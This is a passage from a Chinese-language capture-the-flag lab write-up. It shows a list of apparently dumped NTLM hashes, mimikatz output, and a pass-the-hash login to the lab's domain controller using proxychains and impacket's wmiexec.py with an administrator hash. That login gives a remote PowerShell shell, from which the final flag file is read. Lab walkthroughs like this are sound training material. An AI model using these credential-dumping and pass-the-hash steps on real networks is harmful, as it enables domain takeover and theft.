03 de5143c5f9abb8f5b1d0d9f26240bf68
04 f49b5f58ea17c16d84b6caed3329e3eb
05 7b4675c811c27b8b18d04ca1fddeab41
06 0b634747c142cc2c998e873593275a6d
07 9a850919e1ce9eb117bab41421d98841
08 3b8e33ee6be631a58fb99ad840c4053a
09 cba8c3b50ecfac00fb2913c49d92fa37
10 36cb83756fcf0726bd045799e5888dac
11 136f255e1b4e6eea7c1aab41fbca96d9
12 3b8e33ee6be631a58fb99ad840c4053a
13 403cb5710544a5276aa1ed5cbb03ef37
14 3707bc9d95d4e8c470a2efe6bb814886
15 857cbad29e96529a5366944574b99a6d
16 311fa13028ceca341a2d20631b89a0c0
17 50713d47019ffbf289fbf07ed91e34dc
18 a9390cb585258a8d6f132ad241de172b
19 06f22a6c8f813dbaa73b3570012f8093
20 a34809fbce18cec50539070bb75c78bc
21 61f4e433240a44b9762af3ee8e2fc649
22 dd45206bb14e3f01247d8ed295a462b2
23 2bda6c0bd1d840139ecc2d1833aaa5f5
24 82bb99f494642f0a3f6e29b24da8e3e1
25 453bb36d447c78063e47a9ca8048e73d
26 0ee52ce371145abdff3ea8b525b9f80b
27 3f5cca3b4643f58c14a7093f27b2b604
28 21f7240d8964d1c31d16488a859eab02
29 0ef9bbfc7fb4c00d3de5fd0f1d548264
mimikatz(commandline) # exit
Bye!
PS C:\Users\William\Desktop>
PTH 登录域控:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
PS C:\impacket> proxychains4 -q python3 wmiexec.py xiaorang.lab/administrator@172.22.2.3 -hashes :1a19251fbd935969832616366ae3fe62 -codec gbk -shell-type powershell
Impacket v0.10.1.dev1+20230223.202738.f4b848fa - Copyright 2022 Fortra
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
PS C:\>
...
PS C:\Users\Administrator\flag>type flag04.txt
######: ### ######: ##
####### ## :### ####### ##
## :## ## .#### ## :## ##
## ## ##.#### ## ## ####### .####: ##.## ## ## .####. :#### :###.##
## :## ####### ## ## ####### .######: :#: ## ## :## .######. ###### :#######
#######. ###. ## ## ## ##: :## .## ## #######: ### ### #: :## ### ###
#######. ## ## ## ## ######## ## ## ###### ##. .## :##### ##. .##
## :## ## ## ## ## ######## ######## ## ##. ## ## .####### ## ##
## ## ## ## ## ## ## ######## ## ## ##. .## ## . ## ##. .##
## :## ## ##: ### ##. ###. :# ## ## :## ### ### ##: ### ### ###
######## ## ####### ##### .####### ## ## ##: .######. ######## :#######
###### ## ###.## .#### .#####: ## ## ### .####. ###.## :###.##
Well done hacking!
This is the final flag, you deserve it!
flag04: flag{9d4840b1-dafc-4b2c-aa43-8efff8a7aa72}
本文由作者按照 CC BY 4.0 进行授权